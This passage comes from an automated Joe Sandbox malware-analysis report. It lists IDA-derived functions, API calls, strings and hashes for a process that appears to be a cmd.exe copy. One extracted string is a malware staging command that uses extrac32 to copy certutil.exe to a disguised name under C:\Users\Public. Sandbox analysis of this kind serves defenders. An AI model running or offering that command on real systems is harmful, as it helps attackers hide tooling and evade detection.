                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: wcschr$Heapiswspace$AllocProcess
                                        • String ID: A
                                        • API String ID: 3731854180-3554254475
                                        • Opcode ID: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                                        • Instruction ID: 1d990b80358f498c4672fffeeb28a5c0cea5f9e3c1ac3af7e69fda931794c4dc
                                        • Opcode Fuzzy Hash: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                                        • Instruction Fuzzy Hash: 56A18E21B0D64286E660BF52A45067DFBA5FB997A1F808035CF6D47798FF3CA641CB20
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: MemoryProcessRead$AddressLibraryLoadProc
                                        • String ID: NTDLL.DLL$NtQueryInformationProcess
                                        • API String ID: 1580871199-2613899276
                                        • Opcode ID: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
                                        • Instruction ID: 91418796ee1825daac22deab3be43ef2c812714ba747299b6d11db00f0d01446
                                        • Opcode Fuzzy Hash: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
                                        • Instruction Fuzzy Hash: CC516D71B1CB8282EB50AF56A844279F7A5FB88BA4F845135EEAE07754EF3CD201C714
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: CloseCreateFileHandle_open_osfhandle_wcsicmp
                                        • String ID: con
                                        • API String ID: 689241570-4257191772
                                        • Opcode ID: c7a2234d9573f6b473384a9ead2fa3a6435853c7d94b0c157743cf5a0c0f015b
                                        • Instruction ID: 1356fadb7746433e777cbee8385e44a40a12ac8f6e42d2780001901f1ec4c242
                                        • Opcode Fuzzy Hash: c7a2234d9573f6b473384a9ead2fa3a6435853c7d94b0c157743cf5a0c0f015b
                                        • Instruction Fuzzy Hash: B8418F32B0CA4586E210AF15A484379BAA5FB89BB4F948334DF3D53790EF3CDA498750
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Heap$File$Process$AllocCloseCreateFreeHandlePointerRead
                                        • String ID: PE
                                        • API String ID: 2941894976-4258593460
                                        • Opcode ID: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
                                        • Instruction ID: fb7badd70ec7be572aae6f223bf93bb2151ecf80b5bf346194cb778309efe392
                                        • Opcode Fuzzy Hash: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
                                        • Instruction Fuzzy Hash: 7141863170C64186EA20AF15E455279F7A1FB89BA0F844134DFAD03B95EF3CE545CB20
                                        APIs
                                        • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF7CD4A849D,?,?,?,00007FF7CD4AF0C7), ref: 00007FF7CD490045
                                        • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF7CD4AF0C7,?,?,?,?,0000000A,?,00000002,00000000,?,?,0000002F,00007FF7CD4AE964), ref: 00007FF7CD490071
                                        • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7CD490092
                                        • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7CD4900A7
                                        • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7CD490148
                                        • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF7CD490181
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: File$LockPointerShared$AcquireByteCharMultiReadReleaseWide
                                        • String ID:
                                        • API String ID: 734197835-0
                                        • Opcode ID: 350a32b8b7773a328a2c6bfa9f033ab7091b859c3389a923f16ee056ea562ebb
                                        • Instruction ID: b8ba898fc933f2e67012cd421ae0a9143a285e6fe9949ac9fccd564d16ae33dd
                                        • Opcode Fuzzy Hash: 350a32b8b7773a328a2c6bfa9f033ab7091b859c3389a923f16ee056ea562ebb
                                        • Instruction Fuzzy Hash: 4E61B531B0C69296E720AF16A804739FBA6BB49765F848131DF6E03794FF3DA645C710
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Enum$Openwcsrchr
                                        • String ID: %s=%s$.$\Shell\Open\Command
                                        • API String ID: 3402383852-1459555574
                                        • Opcode ID: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                                        • Instruction ID: 9e12b4513baa89788baad19acefcc0558cac7d0340b6862465f0231dc8299744
                                        • Opcode Fuzzy Hash: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                                        • Instruction Fuzzy Hash: 0FA1A121B0CA8292EA10AF5594542BAE2A1EF85BA0FC44531DF6E477C5FF7CEB41C720
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: memset$wcscmp
                                        • String ID: %s
                                        • API String ID: 243296809-3043279178
                                        • Opcode ID: b0ad3edef7fc64e03d81687a8a254aeebb6f4c69458638a3e2c38bf1209308ef
                                        • Instruction ID: 7bf07df5edfd7e64d924af501c20f3fa076346c614642d5addb348efba9b929f
                                        • Opcode Fuzzy Hash: b0ad3edef7fc64e03d81687a8a254aeebb6f4c69458638a3e2c38bf1209308ef
                                        • Instruction Fuzzy Hash: 29A18C2270DA8696EB21EF22E844BF9A396BB48768F904035DF5D47695EF3CE7448310
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: memset$EnvironmentVariable
                                        • String ID: DIRCMD
                                        • API String ID: 1405722092-1465291664
                                        • Opcode ID: ffb8ac6f460930c1464a251cfe4f6a37909ed3687fd59a2300d1627ea223b7d7
                                        • Instruction ID: e15f43fa1cacbadfec85eed35fe3feff0865cf3866f65dcae3f6fcb42f0ab3ba
                                        • Opcode Fuzzy Hash: ffb8ac6f460930c1464a251cfe4f6a37909ed3687fd59a2300d1627ea223b7d7
                                        • Instruction Fuzzy Hash: 02814C72B08BC18AEB20DF61A8802ED77A5FB44798F904139DF9D57B59EF38D2458710
                                        APIs
                                          • Part of subcall function 00007FF7CD48CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD48B9A1,?,?,?,?,00007FF7CD48D81A), ref: 00007FF7CD48CDA6
                                          • Part of subcall function 00007FF7CD48CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD48B9A1,?,?,?,?,00007FF7CD48D81A), ref: 00007FF7CD48CDBD
                                        • wcschr.MSVCRT(?,?,?,00007FF7CD4899DD), ref: 00007FF7CD489A39
                                          • Part of subcall function 00007FF7CD48DF60: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,00000000,00007FF7CD48CEAA), ref: 00007FF7CD48DFB8
                                          • Part of subcall function 00007FF7CD48DF60: RtlFreeHeap.NTDLL ref: 00007FF7CD48DFCC
                                          • Part of subcall function 00007FF7CD48DF60: _setjmp.MSVCRT ref: 00007FF7CD48E03E
                                        • wcschr.MSVCRT(?,?,?,00007FF7CD4899DD), ref: 00007FF7CD489AF0
                                        • wcschr.MSVCRT(?,?,?,00007FF7CD4899DD), ref: 00007FF7CD489B0F
                                          • Part of subcall function 00007FF7CD4896E8: memset.MSVCRT ref: 00007FF7CD4897B2
                                          • Part of subcall function 00007FF7CD4896E8: ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7CD489880
                                        • _wcsupr.MSVCRT ref: 00007FF7CD49B844
                                        • wcscmp.MSVCRT ref: 00007FF7CD49B86D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Heap$wcschr$Process$AllocFree_setjmp_wcsuprmemsetwcscmp
                                        • String ID: FOR$ IF
                                        • API String ID: 3663254013-2924197646
                                        • Opcode ID: f7cff311b475cb809cbefbcbc2ea312c8d083385a1c2e3cb15cb3788630bb160
                                        • Instruction ID: cf93df99e65922aea80a464eee2f278b589868cd38e141edc3684aefac300212
                                        • Opcode Fuzzy Hash: f7cff311b475cb809cbefbcbc2ea312c8d083385a1c2e3cb15cb3788630bb160
                                        • Instruction Fuzzy Hash: 9F518120B0DA4285EE55BF169854579A696BF88BF0BC84634DF7E477D1FF3CA6018320
                                        APIs
                                        • iswdigit.MSVCRT(?,?,00000000,00007FF7CD491F69,?,?,?,?,?,?,?,00007FF7CD48286E,00000000,00000000,00000000,00000000), ref: 00007FF7CD48F0D6
                                        • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF7CD48E626,?,?,00000000,00007FF7CD491F69), ref: 00007FF7CD48F1BA
                                        • wcschr.MSVCRT(?,?,00000000,00007FF7CD491F69,?,?,?,?,?,?,?,00007FF7CD48286E,00000000,00000000,00000000,00000000), ref: 00007FF7CD48F1E7
                                        • iswdigit.MSVCRT(00000000,00000000,?,00000000,?,00007FF7CD48E626,?,?,00000000,00007FF7CD491F69), ref: 00007FF7CD48F1FF
                                        • iswdigit.MSVCRT(?,?,00000000,00007FF7CD491F69,?,?,?,?,?,?,?,00007FF7CD48286E,00000000,00000000,00000000,00000000), ref: 00007FF7CD48F2BB
                                        Strings
                                        Similarity
                                        • API ID: iswdigit$iswspacewcschr
                                        • String ID: )$=,;
                                        • API String ID: 1959970872-2167043656
                                        • Opcode ID: 4f4e76ffb3d3d3f1682d86852f25dc45ca8acbfdb86516db9a39298bef1f035d
                                        • Instruction ID: 6bcf1149b944bafa013992cc192756b1a2e1c34b72672c5466ac9a603eedd6cc
                                        • Opcode Fuzzy Hash: 4f4e76ffb3d3d3f1682d86852f25dc45ca8acbfdb86516db9a39298bef1f035d
                                        • Instruction Fuzzy Hash: 70419E61F0C65285FBA4AF15A914379F6E0AF507B1FC45032CFAD821A4FF3CA6818B20
                                        APIs
                                        Strings
                                        Similarity
                                        • API ID: ErrorLast$InformationVolumeiswalphatowupper
                                        • String ID: %04X-%04X$:
                                        • API String ID: 930873262-1938371929
                                        • Opcode ID: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                                        • Instruction ID: 605c9909c0d798856cc884d61a1ebd0fb24614ba40a70aa1788e081a40a54bd4
                                        • Opcode Fuzzy Hash: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                                        • Instruction Fuzzy Hash: ED416121B0CA82D2E760AF65E4542BAF2A1FB85764FC04136DF6E426D5EF3CE645C720
                                        APIs
                                        Strings
                                        Similarity
                                        • API ID: FileWrite$ByteCharMultiWide$_get_osfhandle
                                        • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                        • API String ID: 3249344982-2616576482
                                        • Opcode ID: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                        • Instruction ID: b2b052761bee8f90e345300f186ced72426a92be806872f36e1bcebb518d5385
                                        • Opcode Fuzzy Hash: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                        • Instruction Fuzzy Hash: A8417072A1CA4186E7109F12A844739FAA6FB99FA4F888234DF5907794DF3CD2148B10
                                        APIs
                                        • iswdigit.MSVCRT(?,?,00000000,00007FF7CD4968A3,?,?,?,?,?,?,?,00000000,?,00007FF7CD4963F3), ref: 00007FF7CD496A73
                                        • wcschr.MSVCRT(?,?,00000000,00007FF7CD4968A3,?,?,?,?,?,?,?,00000000,?,00007FF7CD4963F3), ref: 00007FF7CD496A91
                                        • wcschr.MSVCRT(?,?,00000000,00007FF7CD4968A3,?,?,?,?,?,?,?,00000000,?,00007FF7CD4963F3), ref: 00007FF7CD496AB0
                                        • wcschr.MSVCRT(?,?,00000000,00007FF7CD4968A3,?,?,?,?,?,?,?,00000000,?,00007FF7CD4963F3), ref: 00007FF7CD496AE3
                                        • wcschr.MSVCRT(?,?,00000000,00007FF7CD4968A3,?,?,?,?,?,?,?,00000000,?,00007FF7CD4963F3), ref: 00007FF7CD496B01
                                        Strings
                                        Similarity
                                        • API ID: wcschr$iswdigit
                                        • String ID: +-~!$<>+-*/%()|^&=,
                                        • API String ID: 2770779731-632268628
                                        • Opcode ID: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
                                        • Instruction ID: a9853a7cba4e009d46bb94343a1f46c920237e00af50becf4b256b6b1526955a
                                        • Opcode Fuzzy Hash: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
                                        • Instruction Fuzzy Hash: B8316C3270CE6685EA50AF52E450678B6A5FB59F94B858035DF6E03354FF3CE600C720
                                        APIs
                                        Similarity
                                        • API ID: File_get_osfhandle$Pointer$BuffersFlushRead
                                        • String ID:
                                        • API String ID: 3192234081-0
                                        • Opcode ID: 21cbebea3a03736acc453a065156524b21459c684ab1bf839b7458faa090dfc7
                                        • Instruction ID: 1354757dfc7729473c4899b9df5a711c3d22e25c901053b3378d111f80f399fd
                                        • Opcode Fuzzy Hash: 21cbebea3a03736acc453a065156524b21459c684ab1bf839b7458faa090dfc7
                                        • Instruction Fuzzy Hash: 32315E31B08A419BE710BF62A44467DFAA1FB89BA0F849134DF6A477A5EF3CD5018B10
                                        APIs
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,00000000,?,00007FF7CD4914D6,?,?,?,00007FF7CD48AA22,?,?,?,00007FF7CD48847E), ref: 00007FF7CD491673
                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7CD4914D6,?,?,?,00007FF7CD48AA22,?,?,?,00007FF7CD48847E), ref: 00007FF7CD49168D
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7CD4914D6,?,?,?,00007FF7CD48AA22,?,?,?,00007FF7CD48847E), ref: 00007FF7CD491757
                                        • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7CD4914D6,?,?,?,00007FF7CD48AA22,?,?,?,00007FF7CD48847E), ref: 00007FF7CD49176E
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7CD4914D6,?,?,?,00007FF7CD48AA22,?,?,?,00007FF7CD48847E), ref: 00007FF7CD491788
                                        • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7CD4914D6,?,?,?,00007FF7CD48AA22,?,?,?,00007FF7CD48847E), ref: 00007FF7CD49179C
                                        Similarity
                                        • API ID: Heap$Process$Alloc$Size
                                        • String ID:
                                        • API String ID: 3586862581-0
                                        • Opcode ID: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
                                        • Instruction ID: 3bb158a453407c2897abf5b9603a865e848544f43cfe243c414fe228f80c7f2d
                                        • Opcode Fuzzy Hash: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
                                        • Instruction Fuzzy Hash: DA916F61B0DA4281EA14AF16A444678F7A6FB54BA1F998136DF6D037A0FF3CE641C320
                                        APIs
                                        Similarity
                                        • API ID: ConsoleErrorOpenTitleTokenwcsstr$CloseFormatFreeLastLocalMessageProcessStatusThread
                                        • String ID:
                                        • API String ID: 1313749407-0
                                        • Opcode ID: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
                                        • Instruction ID: 1bcc4565639b50edae71209ecfe99b6331be8da80bf3fd050cb50811b1912ebd
                                        • Opcode Fuzzy Hash: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
                                        • Instruction Fuzzy Hash: E751A222B0C68292EE10BF169904579E69ABF55BB0F884170DF3E073D5FF3CEA408620
                                        APIs
                                        Similarity
                                        • API ID: Error$CurrentDirectoryModememset$EnvironmentLastVariable
                                        • String ID:
                                        • API String ID: 920682188-0
                                        • Opcode ID: 9d1635e35e3ac97de0e6528cece6faaa031c08ed2930d9ed60b369340f3def9a
                                        • Instruction ID: 4871ab34809e254ed3e6647ca1a2ac53cfb8967844ad9561a91dfcb0a98baa00
                                        • Opcode Fuzzy Hash: 9d1635e35e3ac97de0e6528cece6faaa031c08ed2930d9ed60b369340f3def9a
                                        • Instruction Fuzzy Hash: F4515832709B818AEB25EF21D8546E8B7A1FB88BA4F848039CE5E47754EF3CD645C710
                                        APIs
                                        Strings
                                        • extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe , xrefs: 00007FF7CD48E00B
                                        Similarity
                                        • API ID: Heap$FreeProcess_setjmp
                                        • String ID: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                        • API String ID: 777023205-3344945345
                                        • Opcode ID: bbf52200d93ced3108c92f56beefed0410d329e72fd007d8cbedcbd411aea915
                                        • Instruction ID: 714be2d97abfb2d49bfe979a8675b3a43a655fcd095d660e249b2fe165984530
                                        • Opcode Fuzzy Hash: bbf52200d93ced3108c92f56beefed0410d329e72fd007d8cbedcbd411aea915
                                        • Instruction Fuzzy Hash: 08511C31F0DA528AEB54AF15A840578FAA0BF857B0FD44435DF6D862A1FF3DE6408720
                                        APIs
                                        • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF7CD48E626,?,?,00000000,00007FF7CD491F69), ref: 00007FF7CD48F1BA
                                        • wcschr.MSVCRT(?,?,00000000,00007FF7CD491F69,?,?,?,?,?,?,?,00007FF7CD48286E,00000000,00000000,00000000,00000000), ref: 00007FF7CD48F1E7
                                        • iswdigit.MSVCRT(00000000,00000000,?,00000000,?,00007FF7CD48E626,?,?,00000000,00007FF7CD491F69), ref: 00007FF7CD48F1FF
                                        • iswdigit.MSVCRT(?,?,00000000,00007FF7CD491F69,?,?,?,?,?,?,?,00007FF7CD48286E,00000000,00000000,00000000,00000000), ref: 00007FF7CD48F2BB
                                        Strings
                                        Similarity
                                        • API ID: iswdigit$iswspacewcschr
                                        • String ID: )$=,;
                                        • API String ID: 1959970872-2167043656
                                        • Opcode ID: e8a5d63c360e4c13ef561f3ce3dd80187a3c2d8689f5c743dd181e811bfffbc3
                                        • Instruction ID: f2d1d8c6bb824f38342cbcc2516e693f9f01b0cfda586170e0a405a9edce7b86
                                        • Opcode Fuzzy Hash: e8a5d63c360e4c13ef561f3ce3dd80187a3c2d8689f5c743dd181e811bfffbc3
                                        • Instruction Fuzzy Hash: 59418A65F0C61385FBA46F119914279FAE0AF507A1FC45036CFAD821A4FF3CAA818B20
                                        APIs
                                        Strings
                                        Similarity
                                        • API ID: _wcsnicmpfprintfwcsrchr
                                        • String ID: CMD Internal Error %s$%s$Null environment
                                        • API String ID: 3625580822-2781220306
                                        • Opcode ID: 9798a54e4fc5b33e689a2c9d89df2130ab496e8d723cbfb9f498f453c0192420
                                        • Instruction ID: 57bb31afaf0d2424bc72e3db52d07c6e157c05398a08f5ebf2dba76380eaa84e
                                        • Opcode Fuzzy Hash: 9798a54e4fc5b33e689a2c9d89df2130ab496e8d723cbfb9f498f453c0192420
                                        • Instruction Fuzzy Hash: 6A319C22B0CA4692EA14AF42A5001BAF2A5BB55BB4FC44535CF3D177A5FF3CE645C320
                                        APIs
                                        Similarity
                                        • API ID: memsetwcsspn
                                        • String ID:
                                        • API String ID: 3809306610-0
                                        • Opcode ID: b301965ff12d262252dd12f41c330d116590c5451c87bac9252232e49858c122
                                        • Instruction ID: e945a3366756f0527f25becc40ad9beafd39f69a297922c428804036c8270bce
                                        • Opcode Fuzzy Hash: b301965ff12d262252dd12f41c330d116590c5451c87bac9252232e49858c122
                                        • Instruction Fuzzy Hash: 93B19161B0CA4286EA50AF16E490A7AB7A5FB84BA0FC48031CF6D47795FF7CD641C720
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
